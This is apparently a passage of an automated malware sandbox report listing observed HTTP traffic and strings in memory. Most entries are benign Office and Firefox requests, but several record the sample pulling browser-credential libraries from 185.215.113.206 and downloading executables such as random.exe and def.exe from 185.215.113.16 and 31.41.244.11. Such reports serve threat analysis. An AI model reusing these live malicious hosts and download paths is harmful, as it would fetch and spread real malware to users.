Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: chrome.exe, 00000022.00000003.2872705809.00006DEC006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2998389906.00006DEC00412000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: firefox.exe, 00000031.00000002.3342513448.0000024F70E31000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: chrome.exe, 00000022.00000003.2872705809.00006DEC006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2998389906.00006DEC00412000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: True if the "Variant 2" of the Migration Wizard browser / profile selection UI should be used. This is only meaningful in the new Migration Wizard.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: True if the "Variant 2" of the Migration Wizard browser / profile selection UI should be used. This is only meaningful in the new Migration Wizard.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: True if the "Variant 2" of the Migration Wizard browser / profile selection UI should be used. This is only meaningful in the new Migration Wizard.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000031.00000002.3317267748.0000024F7016F000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
